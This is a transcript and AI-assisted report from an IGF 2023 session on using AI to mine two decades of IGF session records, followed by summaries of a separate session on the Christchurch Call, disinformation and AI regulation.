Okay, I guess you can hear me now. Good, great to see you. You are in a unique position, and it is the loss of the 5,000 people who are going to miss this session, because this is a special session. And this session is special because it speaks about something which is very concrete and also very powerful. It speaks about knowledge that has been developed over the last 18-plus years in the IGF community. Think just about all of the sessions and discussions at this IGF, what was said, the questions that were asked, and what knowledge each of us gathered from it. Well, I write books, and I have a few books, and here and there I publish them; some people get interested in them, some not. And this is a way of preserving this knowledge. But generally speaking, this knowledge is not codified and made useful for our discussion, and not only for us here. That’s important, but also for people outside the IGF community who are impacted by what is discussed here, or who may need to know more about digitalization issues. Now Diplo, together with Markus Kummer, who is with us today and who is, for those of you who are not aware, one of the real fathers of the Internet Governance Forum. There are so many fathers, you know; success has many fathers. But he created the first IGF, and we started in 2006 with the first reporting from the IGF, and remote participation in that first reporting. Therefore we now have 18 years of reporting from the IGF, which is a very powerful knowledge base. We are reporting from this IGF as well. So for almost any session, including this session, you can get a few things: a summary report written by experts, a report drafted by artificial intelligence, and also the IGF daily. You know how it is: the first day you try to follow the sessions, and you’re enthusiastic that you will grasp what’s going on.
At least in my experience, after the first day you realize that it’s not possible, and you start navigating the lunch areas and the bar areas and connecting, which is great. I think this is a great purpose of the IGF. But what we do every day, based on this reporting, is create the IGF daily. There is the IGF daily from yesterday, which has a summary of discussions and the top picks of the day. Therefore, with the help of the AI system and our experts, we create a summary of what was discussed the previous day. Now, we were very critical today, because there are so many repetitions, you know: technology will give opportunities but also create risks, but there are also some new insights and ideas. So there is that interplay between repeating, repeating, repeating, but also having some new insights. Now, what you can also consult here, and you can see on this website, I’m introducing it this way, functionally, because this is the way to understand what we are basically discussing when it comes to AI. And here is, for example, one interesting session I know of, I’m sorry, but I’ll find it here. It was climate, I think, one of the critical ones, probably I’ll miss it, where you have the summary of the session and also an indication of what was said and how the discussion space was framed. So you can have that, and this is done by artificial intelligence. As we discussed, this session is also codified and translated by artificial intelligence, and you can see the main points from the discussion. You can see, for example, at least one session that I was in, which is bottom-up AI. You can see that there is a report from the session and there is a knowledge graph: how the arguments which Sorina, who is here, and I made relate to each other, around topics, around issues. Therefore you can finish this meeting with one big knowledge graph, where you can see how the discussion in this session relates to some other session.
This is a huge, powerful knowledge database which is completely unused, and it is a public good. It belongs to all of us. This session aims to initiate a discussion about it, together with our panellists: Markus, colleagues from the IGF Secretariat, Anja, and, of course, Sorina. Markus, when you started the IGF, did you plan to build this big AI system or not? Just a few suggestions and reflections from your side, and then we will move to Anja.

Markus Kummer:
Well, AI was not a hot issue then. There were other issues, but let's not forget that 20 years ago the internet was not the same as it is now. I do remember when we celebrated the first billion internet users, the first billion online; I think it was 2005 or so. Now we have around six billion internet users, so the sheer numbers alone make a huge difference. In 2005 we didn't have video streaming, we didn't have Skype, there was no Netflix, there was no YouTube. All these things have been added since; the apps didn't exist, there were no smartphones, so it was a totally different environment. But what was already clear was that people, the internet users, cared very much about the internet. Access to the internet was still the number one priority, and connectivity remains an important issue. I do remember, I think it was 2008 or so, when we started thinking about bringing more people online. Access was always a big issue, but in 2008, at the meeting in Hyderabad, somebody said that the biggest challenge would actually be not the next billion people but the last billion: bringing the last billion online, because the next billions would come almost automatically; industry would do it. And it has happened that way indeed; we now have six billion people online, but the last billion will be a challenge. As was also mentioned in today's session on the way towards the GDC, there are digital issues but there are also analogue issues, and I think languages remain an analogue issue. To be really inclusive, I think the internet must become more multilingual. It is obvious that the remaining people who are not online yet do not come from the English-speaking world; they come from countries with different languages, and changes will happen.
The more people come online, the more they will come from different cultures, bringing different languages and different cultural values, and that will also have an impact on the internet. But back to your question: no, we didn't think about AI, and we didn't really know what to expect. We just realised there was a hunger for having these discussions, and that manifested itself earlier, during the Working Group on Internet Governance, when we held regular consultations; there was a clear appetite to have these discussions on issues surrounding the internet. Then we had Tunis, and the Tunis Agenda remains very valid. There were those who thought internet governance was just about naming and addressing, but the Tunis Agenda clearly spells out that internet governance is more than naming and addressing, more than the DNS and the allocation of internet protocol resources; it says that internet governance is also about issues relating to the use and abuse of the internet. That is a definition that is very broad indeed, and it obviously also includes AI.

Jovan Kurbalija:
Markus, one thing you mentioned, which I think is also critical for the future of AI, is that there are so-called unintended consequences. You just start moving, you don't know where you will land, and you end up with a great event. If you don't mind, that could be a nice segue from what you mentioned about different cultural contexts: recently we did an analysis of, for example, Ubuntu philosophy, the African philosophy, which is not codified to a large extent, but it should be, and it can influence AI developments. I don't know if you had something else to conclude; then we pass to Anja, Sorina, and then basically…

Markus Kummer:
Pass on, yes.

Jovan Kurbalija:
Good. Anja, you were in the Secretariat, making sure that everything works, which is great work behind the scenes, very often not noticeable. How do you see the knowledge dimension of this huge pool, which we at Diplo are trying to activate somehow? How does it look from the perspective of the Secretariat?

Anja Gengo:
Thank you. Thank you very much, Jovan, and also to Sorina; thank you for organising this session and continuously supporting the IGF. First of all, thank you for your kind words, and a big thank you, of course, to the organisers. I hope you share the same feedback as Jovan so far: that you are enjoying the IGF and that, programme-wise and technically, it meets your requirements so that you feel comfortable navigating this very robust agenda. I fully agree with what Markus and Jovan both said: the IGF is just one big database of everything and everyone, to say it in a very blunt manner. If you look at the past 18 years of the IGF (and we internally, of course, have access to all its archives), it is a lot of terabytes of data: different kinds of reports, documents that have been produced so far, and records of the participation of the world in the IGF and its multistakeholder model. For us, those are precious resources, because they are very important indicators of the status quo, but they are also excellent navigators of where we want to go in the future, given the fact that digital inclusion is at the core of the IGF. Numbers, for example, are important. If you look at the reports on participation statistics by country and by different profiles, you get a very good picture of who is participating, but, most importantly, of who we are leaving behind and where we need to concentrate our capacity development efforts to ensure that everyone is on board with us. All those analyses are done, to a good extent, manually by a very small team at the IGF Secretariat.
It is very good that we are now living in a phase of rapid AI development, where AI, or at least certain segments of it, if in good hands, can be a trusted tool to deal with this big database, to ensure that the data are processed more quickly, and to give you the accurate results you want. So we certainly welcome the involvement of these systems in the IGF, as long as they are trusted systems, as we see them as a great help in improving the process and, especially, in reaching the level of inclusion we have been aiming at for years. Unfortunately, that remains very challenging. Of course, a big portion of the world is unconnected, but even the meaningfully connected portion of the world is still not an active participant in IGF processes. The Secretariat is aware of that, and we work on it. We map, through a multilayered view of the stakeholder community, who is missing: particular countries, particular disciplines, particular target groups. We look at who the marginalised groups are across communities, and you can imagine the complexity there; not every country or community shares the same challenges, resources, and capacity. That is the complexity, and a small team of four or five persons working at the Secretariat in Geneva certainly cannot manage it quickly. So we do welcome these types of support for the IGF system, and I think they would also make the participation of regular participants in the IGF's intersessional work and the annual meeting much quicker, more comfortable, and more meaningful for everyone.

Jovan Kurbalija:
Thank you, Anja. One point that came from your reflection: I think you counted something like 30 sessions discussing AI, and there is a great deal of excitement; everybody would like to become an expert on AI. What we are noticing is a high level of clichés, from the cliché that AI is endangering humanity and will kill us all in a few years, onwards. But one point that always motivates us, at least at Diplo, is that we have to walk the talk: not only talk about AI, but also use AI as a practical tool. I expected a fuller room, but it seems people like the magic, they like to talk about the magic of AI, but not necessarily to see how it works and how it operates. What you are doing in the Secretariat, with very limited resources, is trying to walk the talk, and I think the IG community needs to walk the talk more: to look under the bonnet and see what is going on, what neural networks are, how TCP/IP functions, how you actually do these things. It would make for a much more serious discussion. Here is our next speaker, Sorina, who is, as you know, a person who walks the talk on so many issues, and she is probably the person with the lowest tolerance for any sort of cliché. Sometimes, although I am very careful about clichés, I write something and Sorina just calls me from the other office: what do you mean? That is another cliché. Be a bit tolerant; here and there I may use a cliché. Sorina, how can we walk the talk that Anja started?

Sorina Teleanu:
Well, maybe the question is how we avoid going too much into that. But beyond that, I don't think there is a way to stop people using clichés at the IGF or in any other digital policy discussion. I have a challenge with the mics, apologies; technology is not helping us. I think the idea is to use technology for what it is best at: helping us, not replacing us. As Jovan was saying, there is a lot of talk these days about how AI is going to destroy everything and take our jobs. Well, we have had a bit of fun over the past few days with our reporting, and I think I can say, after two days, that AI is not going to take my job anytime soon. But beyond that, look at the IGF. We are talking about how to make use of technology to show the wealth of knowledge that the IGF has acquired over the years. This is the 18th annual meeting. How many of you have read the most recent annual report? The messages, let's call them that. How many of you have read the IGF messages for the past, let's say, three years?

Jovan Kurbalija:
But be frank.

Sorina Teleanu:
But be frank. Wow. We should give you an award or something. Excellent. And beyond those three years, have you read all the IGF messages? Okay. Well done. The point is that there is so much produced every year. We have recordings from every single session, session reports, the messages, the annual report, policy network reports, best practice forum reports, outcome documents of the parliamentary track, youth dialogue reports. There is so much happening, but we produce them every year and then we kind of leave them there. Can we try to unpack all this knowledge a bit and see how the discussion on, for instance, the digital divide has evolved from 18 years ago, when the IGF started, to now? How can we actually take advantage of everything being discussed here at the IGF to move the debate forward, instead of repeating the same things all over again? We think technology can help here; it can give us a starting point. Okay, I want to have another session (I am speaking too fast) on the digital divide: this is what has been said about the digital divide at the IGF over the previous 18 years; let's see how we take it forward and stop saying the same things all over again. I am trying to respond to Jovan's question about how to avoid clichés: maybe, yes, we can use technology for that. Be a bit more innovative, a bit more forward-looking in how we debate these things, starting from what has been said before and taking it forward instead of repeating the same points. So our hope is that technology is going to help us a bit in that direction. And I think it is also very timely, in the current debates about a possible digital cooperation forum and whether we need something new or not, to show the wealth of knowledge that the IGF has acquired over the years and how we can make the most of it. Thank you.

Jovan Kurbalija:
Thank you. Thank you. We are working, with Sorina's help, on an AI cliché detector, which will immediately detect clichés in any speech; that would be interesting. We have to keep it a bit discreet, because people could be annoyed: oh, I am telling clichés. Like myself: when Sorina detects clichés in my writing, you feel uneasy. We will conclude this intro with Wim. Wim, you have been involved with, let's say, the knowledge aspect of the IGF as an expert consultant and as a participant in the MAG, wearing different hats. What is your take on this huge knowledge base, which was described by all our discussants, and on the possibility of tapping it, the need to tap it, and how to do it?

Wim Degezelle:
Well, thank you. Just to clarify: I have been involved in a number of intersessional activities, and I think they go back to an initiative by Markus, really, to take a first step. An important step, I think, from having discussions on topics at the IGF to having discussions that start in the months before the IGF and try to come up with a tangible output, a tangible report. That was already an important step in the whole context of trying to codify and bring knowledge together. But my experience now is that we are a step further: the discussions are much more focused, but they are still going on in different, I hesitate to use the word, silos (a word which has a whole bunch of different meanings in the context of the IGF). For example, this morning we had the Policy Network on Internet Fragmentation, and one of its messages is that it is important that stakeholders work together and discuss this together, because there are different views. But at the same moment I am aware, having looked at the agenda, that there were ten other workshops talking about the same topic, and some workshops held in the days before were actually saying exactly the same thing, but with different words. They come up with categories, they come up with this message that we have to work together, we have to discuss together, but they just formulate it differently. It would be nice to combine these. And then, coming back to the use of AI and of technologies: if I look at the schedule, it is impossible to do that manually, even afterwards, or even to make the links to last year. I was just checking the tool that analysed what I said this morning, and I must say, I had not read the text, but this tool took the five or ten minutes that I was talking, divided that up into three or four different arguments, and automatically labelled them with key topics.
Then I see it also adds which SDGs could be linked, or are linked, to what I have just said. I think that is already something wonderful. What I think is missing, and what would be great (I think that was the graph you showed earlier), is for it to also take the next step and help with comparing and linking what is being said in other sessions, so that at the end of the week you can say: well, we have had five sessions on this. I don't know if the tool, or the technology, is able to bring that fine-tuning, but it could at least say these sessions were talking about the same thing; go and check whether the nuances are actually new, or whether they are talking about something different. So I think there are huge opportunities there.

Jovan Kurbalija:
Thank you, Wim. Well, as a matter of fact, it exists; we are fine-tuning it. As you said, this is an approximation. The beauty of this reporting system, which our colleagues may show again and which Wim was referring to, is that you are always fine-tuning with the experts. As Sorina said, sometimes we are underwhelmed by the quality, but when you correct it, the AI system learns how to do it better in the next iteration. What Wim was referring to is basically this: if you can just display this quickly, yes, this report from the session, where you have the main points from the discussion provided by AI and fine-tuned by experts. Then you have the knowledge graph, which I mentioned, where the blue points are topics and the white points are speakers. And that is probably the way: if you put in ten sessions on fragmentation-related issues, it can cross-reference them and say, hey, this was the discussion in the session that Wim moderated, and here is the next session; it can help even visually. Then you have, obviously, the narrative report. And, which was also interesting, I just invite you to look into this: at the bottom you have, for each session, what was said and the speed of speaking. We will have the fastest speaker at the IGF, which I am becoming since time is running out, the length of speech, so the shortest and longest speeches at the IGF, and the speech time. And you have a report per speaker, so you can see whether what was said was actually useful for the discussion.

Wim Degezelle:
No, and what I referred to, if you click for more, is exactly the point I was making: you have the different arguments split out and automatically linked to topics. And I think that is a way you can compare with what is being said in other sessions.
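The cross-session comparison described here can be pictured as a small graph operation: if each session report yields (session, speaker, topic) triples, the topics discussed in more than one session are simply the topic nodes connected to several sessions. A minimal sketch of that idea, using only the Python standard library and purely illustrative session, speaker, and topic names (not real IGF data):

```python
# Hypothetical sketch: cross-referencing topics across session reports.
# Each report is reduced to (session, speaker, topic) triples; topics
# appearing in more than one session are candidates for comparison.
from collections import defaultdict

# Illustrative triples, as if extracted from AI-generated session reports
arguments = [
    ("Session A", "Speaker 1", "internet fragmentation"),
    ("Session A", "Speaker 2", "digital divide"),
    ("Session B", "Speaker 3", "internet fragmentation"),
    ("Session C", "Speaker 1", "digital divide"),
]

def cross_references(triples):
    """Map each topic to the sorted list of sessions discussing it,
    keeping only topics that span more than one session."""
    topic_sessions = defaultdict(set)
    for session, _speaker, topic in triples:
        topic_sessions[topic].add(session)
    return {t: sorted(s) for t, s in topic_sessions.items() if len(s) > 1}

print(cross_references(arguments))
# {'internet fragmentation': ['Session A', 'Session B'],
#  'digital divide': ['Session A', 'Session C']}
```

In a real pipeline the triples would come from the AI reporting tool's argument extraction rather than a hand-written list; the grouping step itself is this simple.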

Jovan Kurbalija:
Thank you. Well, I guess this is all from us, unless my fellow panellists want to say more. Anja, your body language?

Anja Gengo:
I am so impressed by this, looking into the speech length, speech speed and so on, and I am very excited to see who wins this mini competition here. I don't think you have me there, but I think I will be among the first five for sure; on speed, yes, the speed. Very interesting, and I think this is very useful for the IGF in the long term.

Jovan Kurbalija:
We may even have an award for the fastest speaker at the IGF, and the slowest.

Markus Kummer:
If I may add a word: I did not talk about AI, but we were aware, of course, of all the knowledge that was there, and in the first years we published it in book form, a summary of all that was said. But who reads a book with a summary? And here, this is an amazing tool. I do remember, back at the 2011 IGF in Nairobi, I was on a panel in the main session, and Vint Cerf pointed out the immense data that had accumulated and said there was a need for data mining. We are a little bit late, but this is precisely that. It is very impressive indeed, a fantastic tool. Thanks.

Jovan Kurbalija:
I remember that session, when the transcriber, or the automatic system, was putting "windsurf" instead of "Vint Cerf". So we have to be careful, because AI can misspell. But I can recall that point. Thank you. Any comments? I think priority will be given to the person who read the last three reports. A good friend and colleague, and it is so great to see you, a somewhat legendary member of the IGF community.

Audience:
Thank you, Jovan, and thank you for the wonderful panel. I would just like to commend the fact that the IGF became a knowledge base for us. Really, the beauty of it was that it was an independent platform that allowed all stakeholders, on an equal footing, to participate, contribute, talk about policy, and also take part in capacity building and learning. The fact that it is a non-outcome event gave it more soft power to influence all internet-related organizations and all stakeholders. We disagreed, we agreed, we reached a consensus, and that consensus flowed to other organizations. With time, it became a knowledge base. And I think it is not only a knowledge base; it is also a soft power, a soft force, that has influenced all related internet governance organizations. And we are blessed with resources from all over the world that we would not have had the chance to know if we had not participated in the IGF, like the wonderful panel that we see here, from all over. So these are all opportunities that have been given to us by the IGF, which some at the time thought would not even continue for more than five years. And now we are at 20 years, and we are looking to 20 years more, hopefully. It actually became a model that has been copied into other dimensions. That was the beauty of the IGF. Another idea, since you talked about AI and clichés: maybe you can use narrative AI to see how the IGF has emerged and evolved over the 20 years, and how it can move to the next 20 years.

Jovan Kurbalija:
Well, we won't ask AI; we will ask you to write this article, because you are a living legend of the IGF. Okay, okay. Thank you. Well, those of you who are on ChatGPT may ask ChatGPT how it would answer El-Ghuzain's questions on this issue. If you don't have any other comments or questions, this was a short and sweet session; we didn't take too much of your time. We heard many interesting ideas: from history, through Anja's Secretariat perspective and Sorina's no-cliché perspective, to Wim's perspective, giving a concrete example of the reporting as it is happening. And that is a concluding statement on the question of rich knowledge, codified not only in the sessions but also in the way the IGF has been developing and performing, building a sort of tacit culture and understanding among thousands of people getting together and generating new knowledge and, sometimes, new ethics, new respect, new understanding. We shouldn't forget it. We do not, unfortunately, live in a society worldwide that cherishes respect for different views; the predominant view is that there are two views, my view and the wrong view, and that is how the world is, unfortunately, developing. But the IGF has been fostering a listening culture, engagement, and respect for others' opinions, and for me personally that has probably been the first achievement of the IGF. And we take away this idea of using AI and human expertise, maybe to do another book on AI and share it with the younger generations who should take it forward for the next 20 years. Thank you very much.

Anja Gengo

Speech speed

177 words per minute

Speech length

742 words

Speech time

251 secs

Audience

Speech speed

157 words per minute

Speech length

301 words

Speech time

115 secs

Jovan Kurbalija

Speech speed

156 words per minute

Speech length

2240 words

Speech time

861 secs

Markus Kummer

Speech speed

150 words per minute

Speech length

676 words

Speech time

270 secs

Sorina Teleanu

Speech speed

192 words per minute

Speech length

604 words

Speech time

189 secs

Wim Degezelle

Speech speed

169 words per minute

Speech length

612 words

Speech time

217 secs
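The statistics above are internally consistent if speech speed is derived as words divided by minutes, i.e. speed = words / (seconds / 60). A quick check of that assumed derivation against the reported figures:

```python
# Verify that the reported speech speeds match words-per-minute derived
# from speech length (words) and speech time (seconds).
# Figures are taken from the statistics table above; the formula itself
# is an assumption about how the tool computes speed.
def words_per_minute(words: int, seconds: int) -> float:
    return words / (seconds / 60)

# Anja Gengo: 742 words in 251 seconds, reported as 177 wpm
print(round(words_per_minute(742, 251)))  # 177
# Sorina Teleanu: 604 words in 189 seconds, reported as 192 wpm
print(round(words_per_minute(604, 189)))  # 192
```

Both rounded results agree with the published speeds, which suggests the per-speaker numbers are computed directly from the transcript word counts and timings.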

Launch of Fellowship for Refugees on Border Surveillance | IGF 2023


Full session report

Audience

This comprehensive analysis covers a wide range of topics related to education, generative AI, risk management, information literacy, multi-stakeholder engagement, the actions of the European private sector in oppressive regimes, the impact of misinformation and disinformation, and the coexistence of privacy and safety in technology design.

One of the discussions revolves around educating people about generative AI and the need to mitigate its risks. The audience seeks advice on how to educate individuals about this technology, indicating recognition of its potential risks. However, the sentiment is neutral, suggesting a need for more information and guidance in this area.

Another argument highlights the importance of promoting critical thinking and curiosity among children in the face of the age of disinformation and rapid technological change. The supporting facts include a quote from Jacinda Ardern, who emphasises the shift from relying on facts obtained from traditional library resources to the current digital age with multifaceted sources. She urges individuals to seek knowledge about the process and origin of the information presented. This positive argument underscores the need to equip children with the necessary skills to navigate and critically evaluate information in the digital era.

The analysis also addresses the need for a multi-stakeholder approach to problem-solving and the challenges faced by civil society, particularly from the Global South, in effectively participating in solution-finding dialogues. These challenges include disparities in accessibility and effectiveness compared to governments and corporate organisations. This observation points towards the importance of inclusivity and equal representation in decision-making processes.

Another notable point relates to monitoring the actions of the European private sector, particularly within countries with oppressive regimes. The argument raises questions about how to effectively monitor the activities of companies operating in these contexts, such as China, Vietnam, and Myanmar. This highlights concerns about the impact of the private sector on human rights and the need for oversight and accountability.

The analysis also delves into the impact of misinformation and disinformation, noting that individuals who distrust institutions are more susceptible to these phenomena. This observation emphasises the importance of building trust in structures and institutions to combat the spread of false information.

Furthermore, the debate on designing technology that balances privacy and safety in the online world is also addressed. The argument suggests that current technology and design choices might limit the coexistence of privacy and safety, forcing the prioritisation of one over the other. This highlights the ongoing challenge of developing technology that can effectively address both concerns.

In conclusion, this analysis highlights the need to educate about generative AI, mitigate its risks, foster critical thinking and curiosity among children, ensure inclusivity in problem-solving dialogues, monitor the actions of the European private sector, build trust in institutions to combat misinformation, and address the challenge of designing technology that balances privacy and safety. These observations reflect the complexity and interdisciplinary nature of the issues discussed, as well as the importance of considering diverse perspectives to inform effective strategies and solutions.

Karoline Edtstadler

During the analysis, several key points were discussed regarding the views expressed by Karoline Edtstadler. Firstly, she emphasised the need for greater recognition and opportunities for ambitious women. Edtstadler observed that women who strive for success are often viewed negatively, being labelled as pushy or attempting to replace men. She believes that society should overcome this perception and provide more support and encouragement to women with ambitious goals.

Secondly, Edtstadler underscored the value of women's unique perspectives in leadership roles. She argued that women's ability to perceive life from their point of view, particularly as those capable of giving birth and responsible for nurturing and upbringing, makes them special. The shared yet different life experiences, such as motherhood, contribute to their valuable insights and decision-making capabilities.

In terms of AI regulation, the European Union’s efforts were commended. The EU is taking the lead in regulating AI and prioritising the classification of risks associated with AI applications. This focus on risk evaluation aims to strike a balance between promoting beneficial AI technologies and addressing potential societal impacts.

Austria was recognised for its proactive approach to digital market regulation. Even before the implementation of the EU’s Digital Services Act (DSA) and the Digital Markets Act (DMA), Austria had already established the Communications Platform Act, effective from 1st January 2021. Under this act, social media platforms are obliged to promptly address online hate speech. Austria’s early actions demonstrate the country’s commitment to creating legal frameworks concerning digital services.

Collaboration and multi-stakeholder involvement were identified as crucial factors in addressing the challenges posed by AI, digital markets, and misinformation. Edtstadler advocated for a concerted effort involving governments, parliamentarians, civil society, and tech enterprises. She emphasised the importance of collective efforts and shared understanding in tackling these complex issues.

The analysis also highlighted the importance of education and awareness in effectively handling the impacts of social media and new technologies like AI. This includes equipping the public with knowledge and skills to navigate technology, particularly among the elderly. Additionally, it was emphasised that regulations should strike a balance between ensuring safety and privacy while still fostering innovation.

Restoring trust in institutions, governments, and democracy was identified as a crucial objective. Given the rise of misinformation and disinformation during events like the Covid-19 pandemic, Europe aims to counter these challenges through robust regulations. By addressing the issue of misinformation, trust can be rebuilt among citizens.

It was also noted that technology, including AI, should not replace human decision-making, particularly in matters like judgment in law enforcement. While AI can offer efficiency in finding judgments and organising knowledge, drawing a clear line between human judgment and AI is important.

Handling the downsides of technology was deemed necessary to ensure its benefits for society. Technologies like AI can be used for good, such as performing precise surgeries and speeding up tasks in law firms. However, challenges and risks should be addressed to make technology beneficial for all.

The analysis further underlined the importance of a multi-faceted approach in decision-making processes. Edtstadler highlighted Austria’s implementation of the Sustainable Development Goals (SDGs), wherein civil society was invited to contribute and share their actions in dialogue forums. This multi-stakeholder approach promotes inclusivity and diversity of perspectives in decision-making.

In conclusion, the analysis emphasised the need for recognition and empowerment of ambitious women, effective regulation of AI and digital markets, collaboration among stakeholders, education and awareness, addressing challenges in democracy and technology, and restoring trust in institutions and governments. These key points and insights offer valuable perspectives for policymakers and individuals seeking to promote a fair and inclusive society in the face of technological advancements.

Jacinda Ardern

The Christchurch Call to Action is a global initiative aimed at tackling extremist content online. It was established in response to a terrorist attack in New Zealand that was live-streamed on Facebook. Supported by over 150 member organizations, including governments, civil societies, and tech platforms, the Call sets out objectives such as creating a crisis response model and better understanding the process of radicalization.

Former New Zealand Prime Minister Jacinda Ardern believes that it is crucial to understand the role of content curation in driving radicalization. She highlights the case of the terrorist involved in the Christchurch attack, who acknowledged being radicalized by YouTube. Ardern calls for an improved understanding of how curated content can influence behavior online.

Ardern advocates for a multi-stakeholder solution to address the presence of extremist content online. She emphasizes the need for collaboration between governments, civil society, and tech platforms, recognizing that it requires a collective effort to effectively eliminate such content. The Call focuses not only on existing forms of online terror tools but also aims to adapt to future forms used by extremists. It proposes measures such as implementing a strong crisis response model and working towards a deeper understanding of radicalization pathways.

Privacy-enhancing tools play a crucial role in preventing radicalization. These tools enable researchers to access necessary data to understand the pathways towards radicalization. By studying successful off-ramps, these tools can contribute to preventing further instances of online radicalization.

One of the challenges in understanding the role of algorithms in radicalization is the issue of privacy and intellectual property. It is difficult to obtain insight into how algorithms may drive certain behaviors due to privacy concerns and proprietary rights. Despite these challenges, gaining a deeper understanding of how algorithms contribute to radicalization is essential.

Artificial intelligence (AI) presents both opportunities and risks in addressing online extremism. AI can assist in areas where there have been previous struggles, such as content moderation on social media. However, caution exists among the public due to potential harm and risks associated with AI. Ardern argues that guardrails need to be established before AI can cause harm, and the development of these guardrails should involve multiple stakeholders, including companies, governments, and civil society.

The involvement of civil society is crucial in discussions around AI in law enforcement to protect privacy and human rights. Ardern believes that civil society, alongside the government, can act as a pressure point in addressing questions regarding privacy and human rights in the context of AI deployment.

Education plays a vital role in addressing online extremism. Teaching critical thinking skills to children is essential to equip them with the ability to think critically and evaluate information. Adapting to rapid technological changes is also necessary, as the accessibility of information has significantly evolved from previous generations, leading to challenges such as disinformation and the need for digital literacy.

The inclusion of civil society and continuous improvement are important aspects of addressing challenges. The creation of a network that includes civil society may face practical obstacles, but ongoing efforts are being made to involve civil society in initiatives such as the Christchurch Call. Ardern acknowledges that learning and improvement are continuous processes, emphasizing the importance of making engagement meaningful and easy.

Overcoming the debate around privacy and safety on social media is a critical step in addressing extremist content online. Efforts to access previously private information through tools created by the Christchurch Call Initiative are underway, allowing researchers to study this information in real-time. The findings of the research will inform further action, involving social media companies in addressing the identified issues.

Disinformation is a significant challenge, and Ardern highlights factors that make individuals susceptible to it, such as distrust in institutions, disenfranchisement, lower socioeconomic status, and lesser education. Preventing individuals from falling for false information is crucial, and rebuilding trust in institutions is necessary to address the impact of disinformation.

Supporting regulators focusing on technological developments is crucial in managing the challenges presented by technological advancements. Ardern acknowledges the poly-crisis resulting from these developments and emphasizes the need to support regulatory efforts.

Ardern expresses optimism in the ability of humans to adapt and design solutions for crises. She has witnessed humans successfully designing solutions and rapidly adapting to protect humanity, giving hope for addressing the challenges posed by technological developments.

Information integrity issues, such as the lack of a shared reality around climate change, undermine efforts to address serious problems. Ardern emphasizes that these issues must be resolved to effectively tackle challenges like climate change.

In conclusion, the detailed analysis highlights the importance of the Christchurch Call to Action in addressing extremist content online. The Call emphasizes the need for a multi-stakeholder approach involving governments, civil society, and tech platforms. Privacy-enhancing tools and understanding the role of algorithms are crucial in preventing radicalization. Guardrails need to be established for AI before it can cause harm, with civil society involvement to protect privacy and human rights. Education plays a vital role in teaching critical thinking skills and adapting to technological changes. The involvement of civil society, continuous improvement, and overcoming the debate around privacy and safety on social media are essential steps in addressing extremist content. The management of disinformation, support for regulators, and human adaptability in designing solutions for crises are also key considerations.

Maria Ressa

The analysis of the given information reveals several important points made by the speakers. Firstly, it highlights the significant online harassment faced by women journalists, which hampers their ability to participate in public discourse. It is reported that women journalists covering misogynistic leaders often face considerable online harassment and are frequently told to ‘buckle up’ by their editors. This indicates a systemic problem that needs to be addressed.

The role of technology in facilitating hate speech and the dissemination of harmful content is also underscored. The Christchurch terrorist attack, for instance, was live-streamed, demonstrating the misuse of technology for spreading violent and harmful content. This highlights the need to address the role of technology in inciting hate and enabling the circulation of such harmful material.

Efforts to address these challenges require more than just asking news organisations to remove harmful content. The analysis suggests that a multi-stakeholder effort is necessary. Following the Christchurch attack, Jacinda Ardern led a successful multi-stakeholder initiative known as the Christchurch Initiative, which aimed to eliminate extremist content online. This approach emphasises the need for collaboration and coordination among various stakeholders to effectively combat online attacks and extremist content.

The analysis also highlights the importance of strong government action in addressing this issue. The New Zealand government, for instance, took robust measures to eliminate the influence of the Christchurch attacker by removing his name and the footage of the attack from the media. However, it is crucial that government action remains inclusive and does not suppress free speech.

Furthermore, the analysis points out that valuable lessons can be learned from the Christchurch approach in combating radicalisation. The approach was developed in response to a horrific domestic terror attack that was live-streamed on Facebook. It aims to understand how people become radicalised, with a focus on the role of curated content and algorithmic outcomes online.

The impact of social media behaviour modification systems and the current focus on content moderation is a source of concern. Data from the Philippines has been analysed, indicating that lies spread faster on social media than factual information. The analysis argues that current solutions, which mainly focus on content moderation, are not effective in addressing the problem. Instead, a shift towards addressing structural issues, such as platform design, is recommended.

Furthermore, the potential harms of generative AI should be prevented rather than merely reacted to. Concerns over the impact of generative AI are mentioned, and the need for proactive measures to address the harm caused by AI is emphasised.

Civil society collaboration and the corruption of the information ecosystem are seen as crucial problems. The analysis suggests that civil society needs to come together more to address these challenges effectively.

The weaknesses of institutions in the global south, as well as countries experiencing regression of democracy, contribute to the challenges. Authoritarian leaders are leveraging technology to retain and gain more power, which further exacerbates the issue.

Interestingly, the analysis highlights that even intelligent individuals can fall victim to misinformation and behaviour modification in information warfare or operations. This emphasises the need for education and awareness to combat these challenges effectively.

The integration of privacy and trust into tech design is seen as possible; however, it often lacks regulation and pressure from civil society.

Lastly, the analysis suggests that we are in a pivotal moment for internet governance. Maria Ressa, one of the speakers, expresses a more pessimistic viewpoint on the situation, while others remain optimistic. The importance of effective internet governance is underscored, as it directly impacts various areas, including peace, justice, and strong institutions.

In conclusion, the analysis highlights the challenges faced by women journalists in public discourse, the negative impact of technology in facilitating hate speech and harmful content, the need for multi-stakeholder approaches, the importance of strong government action, and the lessons from the Christchurch approach. It also emphasises the concerns regarding social media behaviour modification systems and the current focus on content moderation. Structural issues in platform design, prevention of harm from generative AI, civil society collaboration, corruption of the information ecosystem, weaknesses of institutions, susceptibility to misinformation, and the incorporation of privacy and trust into tech design are other noteworthy points raised. Overall, the analysis underscores the significance of effective internet governance in addressing these complex issues.

Session transcript

Karoline Edtstadler:
It’s really a big honor for me to sit on the same panel, even if you’re not here, Jacinda, with you. You are really also a role model for women, and it’s a pleasure that I have the impression I’m getting also a role model by hearing what you said about me. So I would say you can break it down with a joke, which is of course only a joke, and it goes like this: the last 2,000 years, the world has been ruled by men. The next 2,000 years, the world will be ruled by women. It can only get better. But this is not the end of the story, because we are living in a very diverse world. We are living in a challenging world, and I think we need both, the approach of women and of men. But the difference is, and Jacinda already mentioned this, being ambitious is something very important, and we women are judged and seen in a different way. If you are ambitious as a woman, you’re the pushy one. You’re the one who wants to get the position of a man, and so on and so forth. And I think what we as a society have to learn is that we need both ways of seeing the world. And we women can make a difference, because we are giving birth. We are mothers. We are really perceiving life. And I think this is also why we are different from men. And that’s good. There’s nothing bad in it. And especially in times like these, you mentioned a few of the crises we are still going through, it’s very important to have both ways of seeing the world, both assessments, female and male. And one last thing: I think women are still not as good as men at making networks, at holding together, at encouraging ourselves. And that’s why I founded a conference last year in August in Salzburg, which is called The Next Generation is Female. And it’s not about things against men. It’s with the support of strong men. 
And it’s really for female leaders in Europe to get together, to network, to exchange with each other, and to have personal exchanges also and encourage ourselves, because it’s not easy, and we will go into details also regarding hatred on the internet and being judged as a woman.

Maria Ressa:
